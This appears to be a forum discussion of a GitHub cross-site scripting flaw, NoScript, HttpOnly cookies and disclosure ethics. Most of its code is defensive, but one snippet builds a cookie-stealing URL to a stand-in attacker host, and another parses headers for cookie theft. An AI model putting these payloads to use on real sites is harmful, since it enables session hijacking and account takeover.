This might look really funny, but consider this: The javascript you are executing there runs on the github domain. So it can do whatever you can do by manually clicking.
The injected script could, for example, submit a new SSH public key for your account (which doesn't require your password again). Or just be funny and delete repos. Or quietly upgrade your account to a bigger, more expensive plan.
Or they could get a list of your private repositories. Combine that with the upload of a new public key and you get free access to the proprietary code of any account.
Aside from fixing the XSS issue, they really should ask for the password again when uploading a public key.
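For the XSS side, the standard fix is to escape user-controlled text before it is rendered into the page. A minimal sketch of the idea (any real app should lean on its framework's built-in escaping rather than hand-rolling this):

```javascript
// A minimal HTML-escaping helper, illustrating the standard server-side
// fix: encode user-controlled text before it reaches the page.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// An injected payload comes out inert:
escapeHtml('<script>alert(document.cookie)</script>');
// -> '&lt;script&gt;alert(document.cookie)&lt;/script&gt;'
```

Once the payload is encoded like this, the browser renders it as text instead of executing it.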
They should be able to look at their database to determine whether anyone else has used this method to inject arbitrary HTML into a page in the past.
They should then put up a notice on their website to describe what happened, describe how they confirmed that this flaw hasn't been exploited previously, and describe what measures they will take in future to prevent this sort of problem.
In my opinion, that is how a "good" company would react. Anything less would be a disappointment.
> In my opinion, that is how a "good" company would react.
This is (more or less) how GitHub has reacted to security issues in the past. At the moment, however, this seems to be a fairly small exploit that wasn't aggressively used by any would-be exploiters. I definitely don't think GitHub should put up a notice for this.
Would you really want to be alerted every time a website you use closed a minor security hole that had possibly never affected anyone? They absolutely should if any user information was leaked, or if there was downtime involved, but you honestly don't need to keep informing users about this sort of mundane security update. At best, I would suggest it go on their blog.
Not reporting "oh, we found an XSS hole that maybe one or two people had used before" is NOT a disappointment.
> that wasn't aggressively used by any would-be exploiters.
Doesn't matter. A response shouldn't be measured according to how widely a security hole was exploited; every hole should be handled with full information and transparency.
I expect good software developers to report all buffer overflows that they fix, regardless of whether or not they know of any active exploits. So yes, I expect good website admins to do the same with XSS.
NoScript uses a sledgehammer to do a scalpel's job. It would be much more widely used if it were a little more subtle and less noticeable, as most browser extensions are. Scorched-earth blocking is safe, but it very strongly degrades the web-surfing experience. I would much rather they use a heuristics-based approach that warns users when potentially malicious scripts try to run than simply block all scripts. I used it for a couple of years, but stopped when I realized how annoying it made my browsing experience.
You do realize that NoScript is not "block all scripts", right?
I see so many people criticizing it with no apparent experience of using it, and this is the primary misconception I see: it is not "block all scripts". Why would anyone need an extension for that? You can just turn off JavaScript in the preferences. What it is is a domain-by-domain whitelister.
I can't use Chrome because it doesn't have NoScript, and I end up routinely visiting domains that I didn't even realize have some foreign-loaded script that pops up some crappy survey over the page ("please give us your private info under the guise of providing site feedback we intend to ignore!"), or pops up a flash ad, or who knows what. The web is too irritating to use anymore without it. (And Flashblock.)
Also, NoScript does have heuristics, but they can't catch already-in-the-page XSS without firing too many false positives. It does have some decent protection against hostile links that carry XSS-inducing strings in a query string or the like. You can in fact download NoScript and configure it just for that. Personally, I've never had anything but false positives from that check, but I don't cruise fora where such links are common.
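The idea behind that hostile-link check can be sketched with a toy detector - this is not NoScript's actual filter, just an illustration of why the approach both catches reflected-XSS links and can fire false positives:

```javascript
// Toy version of a reflected-XSS heuristic: flag URLs whose query string
// carries markup that could become script if the server echoes it back
// unescaped. NoScript's real filters are far more elaborate than this.
function looksLikeReflectedXss(url) {
  const query = url.split('?')[1] || '';
  const decoded = decodeURIComponent(query);
  // Script tags, javascript: URLs, or inline event handlers in the query.
  return /<\s*script|javascript:|on\w+\s*=/i.test(decoded);
}

looksLikeReflectedXss(
  'http://example.com/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E'); // true
looksLikeReflectedXss('http://example.com/search?q=kittens');         // false
```

Any pattern this crude will inevitably flag some legitimate URLs too, which is the false-positive trade-off mentioned above.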
It isn't anywhere near as hard to use as the critics say. I know this because I use it on three systems and don't even bother trying to synchronize the settings somehow; it's more work to synchronize the settings than just to use it in all three places.
> I can't use Chrome because it doesn't have NoScript, and I end up routinely visiting domains that I didn't even realize have some foreign-loaded script that pops up some crappy survey over the page ("please give us your private info under the guise of providing site feedback we intend to ignore!"), or pops up a flash ad, or who knows what. The web is too irritating to use anymore without it. (And Flashblock.)
> You do realize that NoScript is not "block all scripts", right?
Actually, I didn't. You do realize that the name "NoScript" implies NO SCRIPTS, right? It shouldn't be surprising that many people think it makes your browser execute "no scripts".
NoScript + Flashblock + Adblock gives me a faster browsing experience too. I do disable Adblock on nytimes, reddit, Google, and any other site that provides good content, so that it keeps getting revenue from ads.
It's funny how when you mention NoScript in the presence of web "2.0" developers, most hate it, but if you mention it in the presence of sysadmins, network admins, security bods, general techies, they love it.
You know, having used the web extensively since JavaScript was called LiveScript, I've never had a security issue where blocking JavaScript would have helped. Plugins, yes; using IE and ActiveX, a thousand times yes; but the only problems JavaScript has caused have been annoyances like ads.
The reason is simple: JavaScript actually has a security model and browsers are one of the few bits of software with widely used update systems; plugins and most other applications are much easier targets (all of that juicy native code not coded defensively) and drift horribly out of date.
So, yes, put me firmly on the list of people who find NoScript 70% PR, 20% clunky UI, and 10% meaningful improvement. Something like Chrome's sandbox and click-to-play will deliver a noticeable benefit for the web because it'll actually be used - and even that's somewhat minor, since we're still losing the user-education battle where most exploits are actively assisted by the user.
Are you sure you fully understand XSS? The whole problem with XSS is that it works within the browser's security model. Sandboxing is a totally separate issue.
The vast majority of modern websites use JavaScript for trivial purposes. Like adding advertising, or auto focusing on fields. Most of them still work fine without JavaScript.
Some bits of github don't work unless you enable JavaScript, but most of it does. So I only enable it when I'm using those bits.
I also make sure I log out of github before I start browsing other websites.
With noscript, browsing still works fine, you just have to explicitly allow the javascript you want/need rather than allowing just any site to execute code in your browser.
No, even when you do allow a site to run JS, NoScript includes additional XSS, XSRF, and "click-jacking" protections that aren't normally offered by Firefox.
noscript is per-source, so you can whitelist their <script> blocks and jquery.js, but that random javascript in an onmouseover in a forum comment will do nothing.
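That per-source model boils down to a whitelist lookup on the domain a script is loaded from. A deliberately simplified sketch (NoScript's real logic is far more involved, and the domains here are just examples):

```javascript
// Per-source whitelisting in miniature: a script runs only if the domain
// it is served from is on the user's whitelist. Injected inline handlers
// from untrusted sources never make it onto the list.
const whitelist = new Set(['github.com', 'ajax.googleapis.com']);

function allowScript(sourceDomain) {
  return whitelist.has(sourceDomain);
}

allowScript('ajax.googleapis.com'); // true  -> jquery.js runs
allowScript('evil.example.net');    // false -> blocked
```

The limitation raised in the next comment follows directly from this model: a script injected into a page on an already-whitelisted domain passes the same check as the site's own code.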
Maybe it's been a while, but I thought NoScript was per-domain. In the event of an XSS, the JavaScript may well be included from the page's own domain, and NoScript wouldn't help you there. IIRC, NoScript won't say, "Hey, this script wasn't here the last time you visited this domain - do you want to allow it?"
The main gain is that you no longer have to worry about getting hit by this class of attack whilst browsing as normal. XSS attacks are happening all the time, even on major websites run by extremely clever techies. You think that is very little gain. To me, that gain is worth the hassle of having to manage NoScript. There is also a positive secondary benefit in that most websites which don't require js to work will run a little faster with NoScript enabled.
You might be right. I was personally hit by a Twitter XSS once. The only reason I enabled JavaScript on twitter.com was that you can't (or at least couldn't) post new items without enabling it first.
I don't use the twitter.com website any more, preferring clients that don't run JavaScript. Whenever I can use something other than a web browser to access a service, I will take that path. I use NoScript when that isn't an option.
I also found (and reported responsibly) an XSRF flaw in Linode.com a few months back that I believe has now been fixed. That was quite a dangerous one. I also found an XSS flaw in DuckDuckGo a few weeks back. Maybe this is the reason I'm so "paranoid" about JavaScript. Maybe I'm right to be.
A nice PoC would have been to write some XSS code that adds your SSH key to a user's account if they're logged in when viewing the XSS. I wonder how many HN'ers that would have affected, and how many git repositories would have been exploited.
I don't think it is an exaggeration to say that an XSS flaw on something like GitHub has the potential to be disastrous.
XSS trivially compromises your cookie. If I have your cookie, I am you. Demonstrating cute ways to do things that I could just do by logging in as you is superfluous.
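As a concrete illustration of how little the cookie theft takes: an injected payload just reads document.cookie and smuggles it out, e.g. by loading an image from a server the attacker controls. The endpoint below is entirely hypothetical:

```javascript
// What a cookie-stealing payload boils down to: build a URL carrying the
// victim's cookie and send it to an attacker-controlled server. In a
// browser this would run as, e.g.:
//   new Image().src = buildExfilUrl(document.cookie);
function buildExfilUrl(cookie) {
  // The domain is a made-up placeholder for the attacker's server.
  return 'http://attacker.example/steal?c=' + encodeURIComponent(cookie);
}

buildExfilUrl('session=abc123');
// -> 'http://attacker.example/steal?c=session%3Dabc123'
```

One image request later, the attacker's access log contains your session, and they are you.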
Even doing that as a prank would cause a Big Red Button security audit at some companies. As in, drop what you're doing, we need to go over every line of every commit in the git repo and verify nothing like a server password was committed. Recommendation #1 from that audit will be to stop using github.
> Even doing that as a prank would cause a Big Red Button security audit at some companies. As in, drop what you're doing, we need to go over every line of every commit in the git repo and verify nothing like a server password was committed. Recommendation #1 from that audit will be to stop using github.
We know that the two scenarios (SSH key injection as a prank, and what happened here as a prank) are equivalent.
If a company reacts like that in your scenario but doesn't do the same after what really happened, they're doing something very wrong.
I wouldn't trust that, since there are many paths to the cheese besides document.cookie. For example, Firefox (IIRC) will let Javascript inspect all headers from an Ajax request. The cookie is just another string there...
Is that actually possible, or are you just speculating that it might be? If Firefox lets you access the raw HTTP Cookie header of an HttpOnly cookie via AJAX, I would consider that a security bug, and report it...
I may take out 10 minutes to have a play with that later if nobody else checks first...
I have personal knowledge that it was possible in 2007. I don't keep abreast of developments in browser security that make them more secure: unlike, say, Thomas and the geniuses at Matasano, all I need to know is the worst possible consequence of whatever our wonderful outsourcing partners dreamed up this time. XSS was one step below server-side code execution on our severity scale.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allows access to the headers through XMLHttpRequest. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
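For illustration, the "get the headers out of the string" step really is only a few lines, since getAllResponseHeaders() returns one newline-separated blob. Whether a cookie header actually appears in that blob depends on the browser; modern ones suppress it:

```javascript
// getAllResponseHeaders() hands back a single CRLF-separated string;
// fishing one header out of it is trivial parsing. Modern browsers hide
// Set-Cookie from this string, but older ones did not always.
function getHeader(rawHeaders, name) {
  for (const line of rawHeaders.split(/\r?\n/)) {
    const idx = line.indexOf(':');
    if (idx > 0 && line.slice(0, idx).trim().toLowerCase() === name.toLowerCase()) {
      return line.slice(idx + 1).trim();
    }
  }
  return null; // header not present
}

const raw = 'Content-Type: text/html\r\nSet-Cookie: session=abc123\r\n';
getHeader(raw, 'set-cookie'); // -> 'session=abc123'
```

If the browser exposes the cookie there, this plus the exfiltration trick above is the whole attack.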
Totally academic debate. HttpOnly is a band-aid; being able to inject Javascript still lets me do almost anything that I'd ever want to do with that cookie in the future.
That actually sounds like an awful way to report an XSS. Honestly, as someone who maintains a web service, I have to say I'd prefer private disclosure to even the rickroll approach. All it takes is one "genius" doing some copy-paste action and then you're in a world of hurt and damage control.
Regarding this and the other response to me: I would never do what I described. I was just trying to demonstrate, to those who don't understand XSS properly, that these issues are serious. I don't think a rickrolling really gets that across.
If I do an XSS attack against you on github whilst you are logged in, I can compromise all of your source repositories, your code, and in turn, potentially compromise the systems of your users.
Yes, soon after posting I realised it wasn't the best idea I've ever had. I regret posting this before the Github guys got a chance to fix the hole. Not something I'm going to repeat.
Righteous indignation? You defaced their site. The least you can do is say, "hey, I fucked up your site, here's how". Otherwise you are basically a 4chan script kiddie.
since you were so incensed by my irresponsible, unethical, and downright evil behavior that you saw fit to call me a 4chan script kiddie (horrors!), just thought you'd like to know:
From: "Chris Wanstrath" <chris@redacted.org>
To: mml
Subject: Re: security hole
In-Reply-To: <0228F552-5269-4F44-9D77-82F077DE2242@redacted.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <0228F552-5269-4F44-9D77-82F077DE2242@mml>
Thanks, fixed!
On Wed, Mar 26, 2008 at 3:54 PM, <mml> wrote:
> hi,
>
> github needs to clean up it's xss act:
>
>
> http://github.com/redacted
>
>
> -mml
--
Chris Wanstrath
http://github.com/defunkt
I don't really care, I just took exception to your use of the expression "righteous indignation". By default, people are friends here, and the person who you replied to was a little surprised that you would just mess with github with no intent to help them fix it. You wouldn't go into your friend's living room, shit all over it, and leave, right? People read your post and were a little surprised that you would do the equivalent to github. (Maybe you didn't, but your tone conveyed that you did.)